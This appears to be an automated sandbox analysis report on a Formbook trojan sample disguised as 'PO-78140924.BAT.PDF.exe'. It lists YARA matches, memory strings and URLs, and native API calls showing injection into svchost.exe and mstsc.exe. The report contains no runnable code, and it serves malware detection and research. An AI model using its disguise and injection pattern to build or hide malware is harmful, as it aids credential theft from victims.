            Source: mstsc.exe, 00000004.00000003.2346362902.00000000006C5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mstsc.exe, 00000004.00000003.2345245031.0000000007659000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.00000000050E6000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005D26000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://secure.sahibinden.com/login?return_url=http%3A%2F%2Fwww.mfgarage.net%2F3lu7%2F%3Fvf5pwn%3Dnz
            Source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000004456000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005096000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3899373295.0000000007390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=ultraleap.net
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000004456000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000005096000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3899373295.0000000007390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: mstsc.exe, 00000004.00000003.2351304274.000000000767E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00012344 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00012344
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009CB26 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0009CB26

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3900775999.0000000006310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: PO-78140924.BAT.PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: PO-78140924.BAT.PDF.exe, 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e3465d58-a
            Source: PO-78140924.BAT.PDF.exe, 00000000.00000002.2043823400.00000000000C4000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_daa819c9-d
            Source: initial sampleStatic PE information: Filename: PO-78140924.BAT.PDF.exe
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00013688 NtdllDefWindowProc_W,PostQuitMessage,0_2_00013688
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C216 PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,0_2_0009C216
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00011290 NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,0_2_00011290
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009D422 NtdllDialogWndProc_W,0_2_0009D422
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009D4A8 GetSystemMetrics,GetSystemMetrics,MoveWindow,SendMessageW,SendMessageW,ShowWindow,InvalidateRect,NtdllDialogWndProc_W,0_2_0009D4A8
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C502 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,0_2_0009C502
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C5E7 SendMessageW,NtdllDialogWndProc_W,0_2_0009C5E7
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C668 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,0_2_0009C668
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001167D NtdllDialogWndProc_W,0_2_0001167D
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000116B5 NtdllDialogWndProc_W,0_2_000116B5
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000116DE GetParent,NtdllDialogWndProc_W,0_2_000116DE
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000136E5 NtdllDefWindowProc_W,0_2_000136E5
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009D7F6 NtdllDialogWndProc_W,0_2_0009D7F6
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001189B NtdllDialogWndProc_W,0_2_0001189B
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C8CA NtdllDialogWndProc_W,0_2_0009C8CA
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C8F9 NtdllDialogWndProc_W,0_2_0009C8F9
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C928 NtdllDialogWndProc_W,0_2_0009C928
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001192B NtdllDialogWndProc_W,GetSysColor,SetBkColor,745AC8D0,NtdllDialogWndProc_W,0_2_0001192B
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C973 NtdllDialogWndProc_W,0_2_0009C973
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009C9A8 ClientToScreen,NtdllDialogWndProc_W,0_2_0009C9A8
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00011AC2 NtdllDialogWndProc_W,0_2_00011AC2
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009CAE6 GetWindowLongW,NtdllDialogWndProc_W,0_2_0009CAE6
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009CB26 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0009CB26
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009BF9A NtdllDialogWndProc_W,0_2_0009BF9A
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0009BFF6 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,0_2_0009BFF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C553 NtClose,2_2_0042C553
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,2_2_03C735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03C72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74340 NtSetContextThread,2_2_03C74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73090 NtSetValueKey,2_2_03C73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73010 NtOpenDirectoryObject,2_2_03C73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74650 NtSuspendThread,2_2_03C74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BE0 NtQueryValueKey,2_2_03C72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B80 NtQueryInformationFile,2_2_03C72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BA0 NtEnumerateValueKey,2_2_03C72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AD0 NtReadFile,2_2_03C72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AF0 NtWriteFile,2_2_03C72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AB0 NtWaitForSingleObject,2_2_03C72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C739B0 NtGetContextThread,2_2_03C739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FE0 NtCreateFile,2_2_03C72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F90 NtProtectVirtualMemory,2_2_03C72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FA0 NtQuerySection,2_2_03C72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FB0 NtResumeThread,2_2_03C72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F60 NtCreateProcessEx,2_2_03C72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F30 NtCreateSection,2_2_03C72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E80 NtReadVirtualMemory,2_2_03C72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EA0 NtAdjustPrivilegesToken,2_2_03C72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DD0 NtDelayExecution,2_2_03C72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DB0 NtEnumerateKey,2_2_03C72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D70 NtOpenThread,2_2_03C73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D00 NtSetInformationFile,2_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D10 NtOpenProcessToken,2_2_03C73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D30 NtUnmapViewOfSection,2_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CC0 NtQueryVirtualMemory,2_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CA0 NtQueryInformationToken,2_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C60 NtCreateKey,2_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C70 NtFreeVirtualMemory,2_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C00 NtQueryInformationProcess,2_2_03C72C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045635C0 NtCreateMutant,LdrInitializeThunk,4_2_045635C0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04564650 NtSuspendThread,LdrInitializeThunk,4_2_04564650
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04564340 NtSetContextThread,LdrInitializeThunk,4_2_04564340
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_04562C70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562C60 NtCreateKey,LdrInitializeThunk,4_2_04562C60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_04562CA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562D10 NtMapViewOfSection,LdrInitializeThunk,4_2_04562D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_04562D30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562DD0 NtDelayExecution,LdrInitializeThunk,4_2_04562DD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_04562DF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562EE0 NtQueueApcThread,LdrInitializeThunk,4_2_04562EE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_04562E80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562F30 NtCreateSection,LdrInitializeThunk,4_2_04562F30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562FE0 NtCreateFile,LdrInitializeThunk,4_2_04562FE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562FB0 NtResumeThread,LdrInitializeThunk,4_2_04562FB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_045639B0 NtGetContextThread,LdrInitializeThunk,4_2_045639B0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562AD0 NtReadFile,LdrInitializeThunk,4_2_04562AD0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562AF0 NtWriteFile,LdrInitializeThunk,4_2_04562AF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562B60 NtClose,LdrInitializeThunk,4_2_04562B60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_04562BF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562BE0 NtQueryValueKey,LdrInitializeThunk,4_2_04562BE0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_04562BA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04563010 NtOpenDirectoryObject,4_2_04563010
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04563090 NtSetValueKey,4_2_04563090
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562C00 NtQueryInformationProcess,4_2_04562C00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562CC0 NtQueryVirtualMemory,4_2_04562CC0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562CF0 NtOpenProcess,4_2_04562CF0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04563D70 NtOpenThread,4_2_04563D70
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04563D10 NtOpenProcessToken,4_2_04563D10
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562D00 NtSetInformationFile,4_2_04562D00
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562DB0 NtEnumerateKey,4_2_04562DB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562E30 NtWriteVirtualMemory,4_2_04562E30
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562EA0 NtAdjustPrivilegesToken,4_2_04562EA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562F60 NtCreateProcessEx,4_2_04562F60
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562F90 NtProtectVirtualMemory,4_2_04562F90
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562FA0 NtQuerySection,4_2_04562FA0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562AB0 NtWaitForSingleObject,4_2_04562AB0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_04562B80 NtQueryInformationFile,4_2_04562B80
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A9040 NtReadFile,4_2_004A9040
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A9130 NtDeleteFile,4_2_004A9130
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A91D0 NtClose,4_2_004A91D0
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A9330 NtAllocateVirtualMemory,4_2_004A9330
            Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4_2_004A8EE0 NtCreateFile,4_2_004A8EE0
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001E0600_2_0001E060
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000231900_2_00023190
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000333070_2_00033307
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000323450_2_00032345
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003F3590_2_0003F359
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000464520_2_00046452
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000425AE0_2_000425AE
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000316040_2_00031604
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000256800_2_00025680
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003277A0_2_0003277A
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000378130_2_00037813
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000258C00_2_000258C0
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0004890F0_2_0004890F
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001192B0_2_0001192B
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000289680_2_00028968
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_000469C40_2_000469C4
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00031AF80_2_00031AF8
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003CCA10_2_0003CCA1
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00097E0D0_2_00097E0D
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0001FEA90_2_0001FEA9
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00031F100_2_00031F10
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_0003BF260_2_0003BF26
            Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exeCode function: 0_2_00046F360_2_00046F36
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004185632_2_00418563
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004100232_2_00410023
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E0A32_2_0040E0A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031092_2_00403109
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031102_2_00403110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EB332_2_0042EB33
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FDFC2_2_0040FDFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004026702_2_00402670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FE032_2_0040FE03
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004167432_2_00416743
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F02_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D003E62_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A2_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C2_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA3522_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D2_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C02_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED2_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A02_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE02742_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF81CC2_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B02_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D001AA2_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC81582_2_03CC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7516C2_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F1722_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03C429A0
